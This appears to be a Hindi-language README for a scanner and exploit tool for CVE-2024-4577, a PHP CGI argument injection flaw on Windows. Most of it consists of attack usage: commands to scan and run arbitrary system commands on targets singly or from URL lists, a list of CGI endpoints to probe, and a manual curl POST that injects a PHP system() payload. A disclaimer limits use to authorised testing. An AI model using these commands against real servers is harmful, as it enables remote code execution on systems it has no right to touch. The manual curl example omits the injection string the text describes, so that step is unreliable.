
CVE-2024-4577 के लिए स्कैनर और एक्सप्लॉइट टूल, एक PHP CGI आर्गुमेंट इंजेक्शन कमजोरी जो Windows सिस्टम पर रिमोट कोड निष्पादन सक्षम करती है। इसमें डिटेक्शन और कमांड निष्पादन मॉड्यूल शामिल हैं।
CVE-2024-4577 एक गंभीर PHP CGI आर्गुमेंट इंजेक्शन भेद्यता है जो विंडोज़ सिस्टम को प्रभावित करती है जहाँ PHP CGI मोड में चल रहा है। यह दोष दूरस्थ हमलावरों को विशेष रूप से तैयार URL के माध्यम से PHP की कमांड लाइन में आर्गुमेंट इंजेक्ट करने की अनुमति देता है, जिससे दूरस्थ कोड निष्पादन (RCE) होता है।
इस रिपॉजिटरी में शामिल हैं:
CVE-2024-4577.py: एक स्कैनर जो कमजोर लक्ष्यों का पता लगाता है।exploit.py: एक एक्सप्लॉइट टूल जो PHP कोड भेजता है और कमजोर सर्वर पर सिस्टम कमांड निष्पादित करता है।⚠️ अस्वीकरण
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत परीक्षण के लिए है। इस कोड के किसी भी दुरुपयोग के लिए लेखक जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें और केवल उन वातावरणों में जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।
requests लाइब्रेरीनिर्भरताएँ स्थापित करें:
pip install -r requirements.txt
पता लगाएं कि क्या कोई लक्ष्य CVE-2024-4577 के प्रति कमजोर है:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
स्कैनर और एक्सप्लॉइट सामान्य CGI एंडपॉइंट का परीक्षण करते हैं जैसे:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
पेलोड cgi.force_redirect को बायपास करता है और php://input का उपयोग करके दुर्भावनापूर्ण PHP जोड़ता है।
कमजोर लक्ष्य पर मनमाने सिस्टम कमांड निष्पादित करें:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

आप curl का उपयोग करके मैन्युअल रूप से भी इस भेद्यता का शोषण कर सकते हैं:
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
यह सर्वर पर uname -a निष्पादित करने वाला PHP पेलोड भेजता है और आउटपुट लौटाता है।

यह कोड MIT लाइसेंस के अंतर्गत जारी किया गया है। अधिक जानकारी के लिए LICENSE देखें।